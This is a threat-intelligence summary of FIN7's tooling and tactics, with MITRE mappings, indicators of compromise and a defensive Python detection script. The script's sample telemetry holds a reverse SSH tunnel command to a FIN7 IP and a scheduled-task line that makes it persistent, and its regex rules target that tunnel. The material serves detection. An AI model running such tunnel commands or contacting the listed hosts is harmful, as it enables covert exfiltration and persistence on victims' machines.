FIN7 continues to evolve its operations with multiple pseudonyms, automated SQL injection campaigns, and a growing toolkit including AvNeutralizer to tamper with security solutions. A new AvNeutralizer variant leverages the Windows ProcLaunchMon driver to disrupt protected processes, signaling an advanced EDR-evasion capability shift.
#FIN7 #AvNeutralizer #AuKill #Powertrash #Diceloader #IceBot #CoreImpact #Checkmarks #BlackBasta #Stupor
Key points
- FIN7 is masking its identity with multiple pseudonyms to sustain underground operations.
- Automated SQL injection campaigns targeting public-facing apps are a notable FIN7 tactic (Checkmarks system).
- AvNeutralizer (AuKill) is a specialized EDR-tampering tool marketed in underground forums and used by multiple ransomware groups.
- A new AvNeutralizer version uses a previously unseen technique to tamper with protected processes, employing the ProcLaunchMon driver.
- FIN7’s arsenal includes Powertrash, Diceloader, Core Impact, an SSH-based backdoor, and AvNeutralizer to cover multiple attack phases.
- FIN7 uses staging servers and Powertrash loaders to deliver Core Impact and Diceloader payloads, with persistence via SSH-based backdoors and reverse SSH tunnels for exfiltration.
MITRE Techniques
- [T1562.001] Impair Defenses – AvNeutralizer tampering with security solutions. Source excerpt: ‘the updated version implements previously unseen techniques to tamper with some specific implementations of protected processes.’
- [T1190] Exploit Public-Facing Application – Checkmarks automated attack system primarily aimed at exploiting public-facing Microsoft Exchange servers. Source excerpt: ‘Checkmarks platform, developed by the FIN7 group as an automated attack system … exploiting public-facing Microsoft Exchange servers.’
- [T1055.012] Process Injection – Reflective loading in memory (ReflectiveLoader) to run modules without dropping them to disk. Source excerpt: ‘loading them directly in memory and sending the output back to the attacker through an encrypted channel.’
- [T1059.001] PowerShell – Powertrash droppers with multi-layer obfuscation delivering payloads. Source excerpt: ‘Observed exploitation activities involve PowerShell droppers with multiple layers of obfuscation, ultimately leading to the final URL that downloads and executes the implant.’
- [T1499] Endpoint Denial of Service – New technique to disable endpoint security solutions using ProcLaunchMon.sys to cause a DoS in protected processes. Source excerpt: ‘to create a DoS condition in some protected processes implementations …’
- [T1053.005] Scheduled Task – Persistence via a scheduled task so the reverse tunnel survives reboots. Source excerpt: ‘configured as a scheduled task so it can survive reboots.’
- [T1041] Exfiltration Over C2 Channel – SSH-based backdoor creates a reverse SSH tunnel to stealthily exfiltrate files. Source excerpt: ‘the reverse tunnel is configured as a scheduled task so it can survive reboots. With this setup, the attacker can stealthily exfiltrate files from the compromised machine at any time.’
- [T1105] Ingress Tool Transfer – Powertrash loaders pulled from staging servers to deliver backdoors (Core Impact, Diceloader). Source excerpt: ‘Powertrash loaders delivering Core Impact implants …’
Indicators of Compromise
- [SHA1] Powertrash variants – 05e9e0005fd38a0f168757637c1719d6303bfbac, 343f15cd30791d8d9809ac471bcd39eee0ae09e2
- [SHA1] Core Impact PIC – 0b4974c0d0802f6b8befae8d89abba4593756dfa, 1693ec86bb6de6e0fe64f57484e1ce97bf373081
- [SHA1] AvNeutralizer packed version – 15186e9d03600c667bbe4b34c5e1348bfc0a8168, cc17f8dd1ed74955a9c4d8b5a766ef6a2fa6807d
- [SHA1] AvNeutralizer ordinary variants – 07d0c0c315f99c4f1785645ddd4c3fe665c0448c, 187546da3f90d17329dd999ea481c3ebe3f99845
- [IP Address] FIN7 staging/command and control – 193.178.210.227, 45.87.154.208
- [IP Address] Core Impact C2 – 37.157.254.8, 213.109.192.198
- [IP Address] Diceloader C2 – 194.180.174.86, 91.199.147.152
- [URL] Powertrash/Core Impact payload delivery – hxxp://193.178.210[.]227/work_53.bin_m7.ps1, hxxp://45.87.154[.]208/work_53m8.ps1
- [URL] Diceloader payload delivery – hxxp://45.87.154[.]208/icsnd3b_64refl.ps1
- [File Name] AvNeutralizer userland components – AVDieSe.exe, AVDieSophos.exe
- [Driver/File] ProcLaunchMon.sys (TTD Monitor Driver) – legitimate driver used in the protected-process DoS technique
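As an added example (not part of the original report), the following triage script turns the TTPs above (reverse SSH tunnel, scheduled-task persistence, ProcLaunchMon.sys loading) and the listed IoCs into detection rules run over constructed endpoint telemetry; the event schema (`type`, `image`, `cmdline`, `sha1`) and all sample events are assumptions made for the demo.

```python
import re

# Subset of IoC values copied from the page's Indicators of Compromise list.
IOC_SHA1 = {
    "05e9e0005fd38a0f168757637c1719d6303bfbac": "Powertrash",
    "0b4974c0d0802f6b8befae8d89abba4593756dfa": "Core Impact PIC",
    "15186e9d03600c667bbe4b34c5e1348bfc0a8168": "AvNeutralizer (packed)",
    "07d0c0c315f99c4f1785645ddd4c3fe665c0448c": "AvNeutralizer",
}
IOC_IPS = sorted(["193.178.210.227", "45.87.154.208", "37.157.254.8",
                  "213.109.192.198", "194.180.174.86", "91.199.147.152"])
IOC_FILENAMES = {"avdiese.exe", "avdiesophos.exe"}
# ssh's -R flag declares a remote (reverse) forward; -L and -D are not reverse tunnels.
REVERSE_FWD = re.compile(r"(?:^|\s)-R\s*(\S+)")

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def analyze_event(ev):
    """Return (rule, detail) findings for one event in the constructed schema."""
    findings = []
    cmd, name = ev.get("cmdline", ""), basename(ev.get("image", ""))
    if ev.get("type") == "driver_load":
        if name == "proclaunchmon.sys":  # TTD monitor driver abused by the new AvNeutralizer
            findings.append(("ttd_driver_load", ev["image"]))
        return findings
    sha1 = ev.get("sha1", "").lower()
    if sha1 in IOC_SHA1:
        findings.append(("ioc_sha1", IOC_SHA1[sha1]))
    if name in IOC_FILENAMES:
        findings.append(("ioc_filename", name))
    findings.extend(("ioc_ip", ip) for ip in IOC_IPS if ip in cmd)
    m = REVERSE_FWD.search(cmd)
    if m and name == "ssh.exe":
        findings.append(("ssh_reverse_tunnel", m.group(1)))
    # Persistence variant: the tunnel command wrapped in a scheduled task (/tr "ssh ... -R ...").
    if m and name == "schtasks.exe" and "/create" in cmd.lower() and re.search(r"\bssh(\.exe)?\b", cmd, re.I):
        findings.append(("scheduled_reverse_tunnel", m.group(1)))
    return findings

def triage(events):
    """Run every rule over a batch; returns {event_index: findings} for events that fired."""
    return {i: f for i, f in enumerate(map(analyze_event, events)) if f}

SAMPLE_EVENTS = [  # constructed telemetry, not taken from the report
    {"type": "process_create", "image": r"C:\Windows\System32\OpenSSH\ssh.exe", "sha1": "ab" * 20,
     "cmdline": r"ssh.exe -N -f -R 8022:127.0.0.1:22 -i C:\ProgramData\key user@45.87.154.208"},
    {"type": "process_create", "image": r"C:\Windows\System32\schtasks.exe", "sha1": "cd" * 20,
     "cmdline": r'schtasks.exe /create /sc onstart /tn Updater /tr "ssh.exe -N -R 8022:127.0.0.1:22 user@45.87.154.208"'},
    {"type": "process_create", "image": r"C:\Users\Public\AVDieSe.exe", "cmdline": "AVDieSe.exe",
     "sha1": "15186e9d03600c667bbe4b34c5e1348bfc0a8168"},
    {"type": "driver_load", "image": r"C:\Windows\Temp\ProcLaunchMon.sys", "cmdline": ""},
    {"type": "process_create", "image": r"C:\Windows\System32\OpenSSH\ssh.exe", "sha1": "ef" * 20,
     "cmdline": "ssh.exe -L 8080:intranet:80 admin@10.0.0.5"},  # benign local forward, should not fire
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, hits)
```

The ProcLaunchMon.sys rule will also fire on legitimate Time Travel Debugging sessions, so treat it as a lead to correlate with the other findings rather than a standalone alert.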